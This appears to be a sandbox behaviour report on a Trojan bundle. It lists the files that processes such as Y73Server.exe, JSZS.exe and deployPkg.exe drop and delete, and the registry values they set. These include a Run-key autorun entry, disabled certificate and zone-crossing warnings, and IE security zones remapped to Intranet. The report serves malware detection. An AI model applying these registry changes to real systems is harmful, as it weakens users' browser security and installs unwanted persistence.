%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\index[1].swf (1254 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\2[1].js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dot[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1222[1].htm (1 bytes)
C:\copy%original file name%.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\29041[1].htm (6445 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\z_stat[2].php (834 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ad[1].htm (588 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sound[1].swf (5199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g2[1].js (457 bytes)
The process setup_30015.exe:1220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\anote\Alarm.wav (13 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmF.tmp\nsisdl.dll (14 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\¶à²Ê±ãÇ©.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\öÃâ€ÃƒËœ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswE.tmp (35237 bytes)
%Program Files%\anote\anote.exe (35784 bytes)
%Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (1 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\°ïÖú.lnk (286 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmF.tmp\nsisdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmF.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswD.tmp (0 bytes)
The process Y73Server.exe:2208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[3].php (764 bytes)
C:\ (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@61.196.186[1].txt (212 bytes)
%Documents and Settings%\%current user%\FAVORITES (4 bytes)
%Program Files%\MESSENGER (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%Program Files%\Internet Explorer (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (1628 bytes)
%Documents and Settings%\%current user%\Local Settings (4 bytes)
%System%\Macromed\Flash (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\search_btn[1].png (534 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\61.196.186[1].htm (4 bytes)
%Program Files%\JiSuZhuShou (4 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (6593 bytes)
%WinDir%\Temp\Perflib_Perfdata_15c.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\do1[1].php (18641 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
%Documents and Settings%\All Users (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN (4 bytes)
%WinDir% (576 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
C:\$Directory (1660 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ© (4 bytes)
%Program Files%\Windows NT (4 bytes)
%System% (9848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ico_here[1].gif (1 bytes)
%Program Files%\anote (4 bytes)
C:\PROGRAM FILES (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J (4 bytes)
%Program Files%\JiSuZhuShou\usbrasr.sys (680 bytes)
%WinDir%\WinSxS\Policies\x86_Policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%System%\config (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (47 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\setting.ini (54 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (480 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\base[1].css (1970 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012015072520150726\index.dat (400 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Y73ÖÖ×ÓËÑË÷ÉñÆ÷ (4 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷ (4 bytes)
%Documents and Settings%\%current user%\Cookies (12 bytes)
The process JSZS.exe:1560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tab2[1].png (2601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tab3[1].png (3190 bytes)
%Documents and Settings%\%current user%\AppData\Local\JiSuZhuShou\dwonJsMobile.dat (28 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\tab3.png (12 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\tab2.png (13 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\Fav9.dat (2 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\Down\ETagFile.dat (450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj[1].htm (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\btns[1].js (376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tj[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tj[1].htm (8 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\edi.dat (709159 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\JiSuZhuShou\btns.js (376 bytes)
Registry activity
The process 069.exe:2820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 78 91 F6 AA 93 6D D3 40 6D F9 B5 16 4B 5C 98"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process copy%original file name%.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072520150726]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072520150726]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015072520150726\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072520150726]
"CacheRepair" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072520150726]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 A5 D6 08 AE 3D 06 0F 07 A8 A1 0D C9 62 4E 47"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072520150726]
"CachePrefix" = ":2015072520150726:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014040820140409]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process -2100_1_ss.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\JiSuZhuShou]
"ci1" = "4294965196"
"ci2" = "1"
[HKLM\SOFTWARE\JiSuZhuShou]
"UpdateVer" = "65537"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\JiSuZhuShou]
"JiSuZhuShoufilename" = "JSZS.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 FD AF 44 81 83 9E FF 1A 6F 36 F9 92 41 5F D6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\JiSuZhuShou]
"JiSuZhuShoufiledir" = "%Program Files%\JiSuZhuShou"
The process ksktiklit_505_s.exe:1556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\1.0.2.8.ktver\DefaultIcon]
"(Default)" = "%System%\shell32.dll,-154"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCR\1.0.2.8.ktver\shell\open\command]
"(Default)" = "%Documents and Settings%\All Users\Application Data\201572519\deployPkg.exe %1 %2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnPostRedirect" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"
"WarnonBadCertRecving" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnonBadCertRecving" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnPostRedirect" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 32 A4 1E 2C C4 75 71 B7 1A 55 6E 92 E8 1F A2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"deployPkg.exe" = "6000"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.ktver]
"(Default)" = "1.0.2.8.ktver"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"fastsee" = "%Documents and Settings%\All Users\Application Data\201572519\deployPkg.exe /tlaclt"
The process Y73P2PSearcher_4.exe:2152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Y73ÖÖ×ÓËÑË÷ÉñÆ÷]
"URLInfoAbout" = "WWW.Y73.COM"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Y73ÖÖ×ÓËÑË÷ÉñÆ÷]
"Publisher" = "ÉîÛÚÊÃÂÀÖ¼ª¿Æ¼¼ÓÃÂÃÂÞ¹«Ë¾"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Y73ÖÖ×ÓËÑË÷ÉñÆ÷]
"DisplayIcon" = "%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73Server.exe"
"SetupId" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Y73ÖÖ×ÓËÑË÷ÉñÆ÷]
"DisplayVersion" = "6.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Y73ÖÖ×ÓËÑË÷ÉñÆ÷]
"DisplayName" = "Y73ÖÖ×ÓËÑË÷ÉñÆ÷ 6.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Y73Server.exe]
"(Default)" = "%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73Server.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD F8 30 BA 07 25 8E 2D 99 31 89 88 DC B1 F5 58"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Y73ÖÖ×ÓËÑË÷ÉñÆ÷]
"UninstallString" = "%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\uninst.exe"
The process deployPkg.exe:2456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
